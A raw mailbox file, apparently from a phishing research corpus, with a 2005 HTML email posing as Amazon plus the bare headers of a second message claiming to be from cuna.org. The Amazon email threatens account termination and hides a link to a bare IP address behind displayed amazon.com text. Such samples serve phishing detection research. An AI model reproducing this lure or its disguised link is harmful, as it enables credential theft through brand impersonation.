From: update@amazon.com <update@amazon.com>
Content-Type: text/html
Message-Id: <20051108125728.03C9F7D904@www.holtonks.net>
Date: Tue,  8 Nov 2005 06:57:28 -0600 (CST)
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *
X-Spam-Status: No, score=2.0 required=5.0 tests=HTML_MESSAGE,
	HTML_TAG_EXIST_TBODY,MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,
	NORMAL_HTTP_TO_IP,RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 428


<HTML>
<meta name="generator" content="Namo WebEditor v5.0(Trial)">
&nbsp;  <IMG height=30 
src="http://g-images.amazon.com/images/G/04/icons/amazon-logo.gif" width=140> <TABLE cellSpacing=0 cellPadding=0 width=600
align=center border=0> <TBODY> <TR> <TD><IMG height=2
src="pp.files/pixel.gif"  width=2></TD></TR></TBODY></TABLE> <P><FONT
size=2><FONT face=Verdana>Dear&nbsp;<STRONG><STRONG><SPAN
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: 
Verdana">Amazon<SUP>® &nbsp;</SUP></SPAN></STRONG>&nbsp;</STRONG>member</FONT>,&nbsp;<BR></font><BR></P>
<P><FONT face=Verdana size=2>It has come to our attention that
your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Amazon</STRONG></SPAN> order Information 
records are &nbsp;<BR>out of date.That requires you to update
the order Information If you could&nbsp;<BR>please take
5-10 minutes out of your online&nbsp;<FONT face=Verdana size=2>
experience and update&nbsp;<BR>your order records,  you will not run 
into any future problems with Amazon&nbsp;<BR>online service.

&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT></FONT></P>
<P><FONT face=Verdana 
size=2><FONT face=Verdana size=2>However, failure to update your records will
result in account termination.&nbsp;<BR>Please update your records in 
maximum 24 hours.&nbsp;</FONT>&nbsp;<BR><BR>Once you have updated
records, your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; 
FONT-FAMILY: Verdana"><STRONG>Amazon</STRONG></SPAN> session
will not be&nbsp;<BR>interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your <SPAN style="FONT-SIZE: 10pt;
COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Amazon</STRONG></SPAN> order Information 
click on the
following link:&nbsp;<BR></FONT></P>
<p><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT><SPAN class=treb><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: Verdana"><A 
onclick="return ShowLinkWarning()" 
href="http://212.44.154.205/icons/exec/register/login/index.html" 
target=_blank>http://www.amazon.com/exec/obidos/account-access-login/ref=/index</A></SPAN></SPAN></p>
<P>&nbsp;<FONT face=Verdana size=2>Best Regards , <BR><SPAN style="FONT-SIZE:  10pt; 
COLOR: black; 
FONT-FAMILY: Verdana"><STRONG>Amazon<SUP> </SUP><SPAN style="FONT-SIZE: 
10pt; COLOR: black; FONT-FAMILY: Verdana">Security </SPAN></STRONG><SPAN
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Departament</STRONG></SPAN></SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</FONT></P> <P><FONT face=Verdana size=2>&nbsp;</font>
<p><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <SPAN class="tiny"><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/508088/103-3650287-7644618"><font color="#006699" size="2">Conditions 
of Use</font></A><font color="#006699" size="2"> | </font><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/468496/103-3650287-7644618"><font color="#006699" size="2">Privacy 
Notice</font></A><font color="#006699" size="2"> </font><font size="2">© 1995-2005, Amazon.com, Inc. or its affiliates. </font></SPAN></p>
<TABLE cellSpacing=0 cellPadding=0 
width=600
align=center border=0> <TBODY> <TR> <TD><IMG height=2
src="pp.files/pixel.gif"  width=2></TD></TR></TBODY></TABLE> <P>
</HTML>

From service@cuna.org  Tue Nov  8 09:07:27 2005
Return-Path: <service@cuna.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id EEC5B536E2B
	for <jose@login.monkey.org>; Tue,  8 Nov 2005 09:07:26 -0500 (EST)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 602F16FA364
	for <jose@monkey.org>; Tue,  8 Nov 2005 09:07:08 -0500 (EST)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  8 Nov 2005 09:07:08 -0500 (EST)
Received: by lujan.uninet.edu (Postfix)
	id 3C8D71BC41; Tue,  8 Nov 2005 15:06:58 +0100 (CET)
Delivered-To: josu@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 1B1391BC1B; Tue,  8 Nov 2005 14:06:58 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 12305-08; Tue, 8 Nov 2005 15:06:35 +0100 (CET)
Received: from rocinante.compendium.com.ar (unknown [200.69.230.3])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 326B11BC0E; Tue,  8 Nov 2005 15:06:16 +0100 (CET)
Received: from localhost (rocinante [127.0.0.1])
	by rocinante.compendium.com.ar (Postfix) with ESMTP id 0469F5001A2;
	Tue,  8 Nov 2005 11:06:10 -0300 (ART)
Received: from rocinante.compendium.com.ar ([127.0.0.1])
	by localhost (rocinante [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 08813-10; Tue, 8 Nov 2005 11:06:08 -0300 (ART)
Received: from 64.27.0.64 (unknown [64.27.0.64])
	by rocinante.compendium.com.ar (Postfix) with SMTP id 0F91850004E;
	Tue,  8 Nov 2005 11:06:06 -0300 (ART)
Received: from 240.224.88.36 by ; Tue, 08 Nov 2005 19:05:07 +0500
Message-ID: <NYXBDKORROYLONKCPBEQRY@yahoo.com>
